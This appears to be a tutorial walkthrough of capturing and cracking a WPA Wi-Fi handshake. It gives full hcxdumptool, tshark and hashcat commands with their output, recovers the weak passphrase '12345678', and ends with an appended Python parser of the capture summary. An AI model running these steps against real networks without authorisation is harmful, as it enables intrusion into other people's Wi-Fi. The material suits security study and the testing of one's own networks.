To get information about the target (e.g. to build an attack filter), tshark should be the first choice to retrieve it:
Show all frames addressed to APs:
$ tshark -i INTERFACE_NAME -Y "wlan.fc.ds == 1" -T fields -e wlan.ra -e wlan.ta
Show all frames addressed to a known AP:
$ tshark -i INTERFACE_NAME -Y "wlan.ra == MAC_AP" -T fields -e wlan.ra -e wlan.ta
There is more than one display filter to get the information.
A complete example (using different filter commands - but the information is the same):
$ sudo nmcli dev wifi list
$ sudo hcxdumptool -m wlp48s0f4u2u1 -c 10a
$ tshark -i wlp48s0f4u2u1 -T fields -e wlan.bssid
Capturing on 'wlp48s0f4u2u1'
08:96:d7:98:e1:9e
$ tshark -i wlp48s0f4u2u1 -Y "wlan.ra == 08:96:d7:98:e1:9e" -T fields -e wlan.ta
Capturing on 'wlp48s0f4u2u1'
00:e6:2d:02:2a:87
$ hcxdumptool --bpfc="wlan addr3 ffffffffffff or wlan addr3 0896d798e19e or wlan addr2 00e62d022a87 or wlan addr1 00e62d022a87" > attack.bpf
$ sudo hcxdumptool -i wlp48s0f4u2u1 --bpf=attack.bpf --exitoneapol=7 -w test.pcapng
0 ERROR(s) during runtime
136 Packet(s) captured by kernel
0 Packet(s) dropped by kernel
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
18 EPB written to pcapng dumpfile
exit on EAPOL M1M2
$ hcxpcapngtool test.pcapng -o test.22000
hcxpcapngtool 6.3.2-48-g369f6f5 reading from test.pcapng...
summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.7.2-arch1-1
application..............................: hcxdumptool 6.3.2-169-gb0c006b
interface name...........................: wlp48s0f4u2u1
interface vendor.........................: 00e62d
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 806d97bf5ccb (incremented on every new client)
MAC CLIENT...............................: 8c8401f6d1be
REPLAYCOUNT..............................: 64686
ANONCE...................................: d41adbe7e48fc29207c49ccce5843bd991ca41703a9d421b60e7c29e63ec6dae
SNONCE...................................: 483bcc0308f7c11eaf9e63222fc3c910736db22600fcb0495f7c3428a31f467e
timestamp minimum (GMT)..................: 30.01.2024 11:11:09
timestamp maximum (GMT)..................: 30.01.2024 11:11:09
duration of the dump tool (seconds)......: 0
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 18
packets received on 2.4 GHz..............: 18
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10
PROBEREQUEST (undirected)................: 1
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 1
AUTHENTICATION (OPEN SYSTEM).............: 1
EAPOL messages (total)...................: 14
EAPOL RSN messages.......................: 14
EAPOLTIME gap (measured maximum msec)....: 52
EAPOL ANONCE error corrections (NC)......: not detected
EAPOL M1 messages (total)................: 13
EAPOL M2 messages (total)................: 1
EAPOL pairs (total)......................: 1
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M12E2 (challenge)..................: 1
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2457: 18
Information: missing EAPOL M3 frames!
This dump file does not contain EAPOL M3 frames (possible packet loss).
It strongly recommended to recapture the traffic or to use --all option to convert all possible EAPOL MESSAGE PAIRs.
session summary
---------------
processed pcapng files................: 1
$ hashcat -m 22000 test.22000 -a 3 "12345678"
hashcat (v6.2.6-848-gc1a10518f) starting
...
1f7b8b5b21b2b6d68b1d1fb60b518f6d:0896d798e19e:00e62d022a87:AP_7272:12345678
...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Tue Jan 30 11:13:06 2024 (0 secs)
Time.Estimated...: Tue Jan 30 11:13:06 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 93 H/s (0.41ms) @ Accel:32 Loops:256 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 46c Fan: 30% Util: 11% Core:2835MHz Mem:10802MHz Bus:16
Started: Tue Jan 30 11:13:05 2024
Stopped: Tue Jan 30 11:13:07 2024
BTW:
This warning was expected:
Information: missing EAPOL M3 frames!
This dump file does not contain EAPOL M3 frames (possible packet loss).
because hcxdumptool has been told (by option exitoneapol) to terminate after an EAPOL MESSAGE PAIR has been received.
That was the case on M1M2. When the M3 was transmitted, hcxdumptool had already terminated.
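As an added example (not part of the original post or of the hcxtools project): a small Python parser for the hcxpcapngtool summary shown above, which makes the defensive point of this session explicit: an M1M2 pair alone produced a 22000 hash line despite the missing-M3 warning, so the passphrase is the only barrier. The helper names and the `EAPOL M3 messages (total)` label are assumptions.

```python
import re

# Constructed sample: a subset of the hcxpcapngtool summary lines from the session above.
SAMPLE_SUMMARY = """\
EAPOL messages (total)...................: 14
EAPOL M1 messages (total)................: 13
EAPOL M2 messages (total)................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M12E2 (challenge)..................: 1
Information: missing EAPOL M3 frames!
"""

# Summary lines have the shape "<label>....: <value>" with dot padding after the label.
SUMMARY_LINE = re.compile(r"^(?P<label>.+?)\.{2,}: (?P<value>.*)$")


def parse_summary(text):
    """Return {label: value} for every dot-padded summary line."""
    fields = {}
    for line in text.splitlines():
        match = SUMMARY_LINE.match(line.strip())
        if match:
            fields[match.group("label")] = match.group("value").strip()
    return fields


def counter(fields, label):
    """Leading integer of a value such as '1 (RC checked)'; 0 if the line is absent."""
    match = re.match(r"\d+", fields.get(label, ""))
    return int(match.group()) if match else 0


def assess_exposure(text):
    """Hypothetical helper: summarise what the capture exposes to offline guessing."""
    fields = parse_summary(text)
    # The M3 label is assumed to follow the M1/M2 pattern; it is absent from the page's output.
    m3 = counter(fields, "EAPOL M3 messages (total)")
    pairs = counter(fields, "EAPOL pairs written to 22000 hash file")
    return {
        "m1": counter(fields, "EAPOL M1 messages (total)"),
        "m2": counter(fields, "EAPOL M2 messages (total)"),
        "m3": m3,
        "hash_lines": pairs,
        "m3_warning": "missing EAPOL M3 frames" in text,
        # An M1M2 pair alone yields a 22000 line, so the passphrase is the only barrier.
        "offline_guessing_possible": pairs > 0,
        "stopped_before_m3": pairs > 0 and m3 == 0,
    }
```
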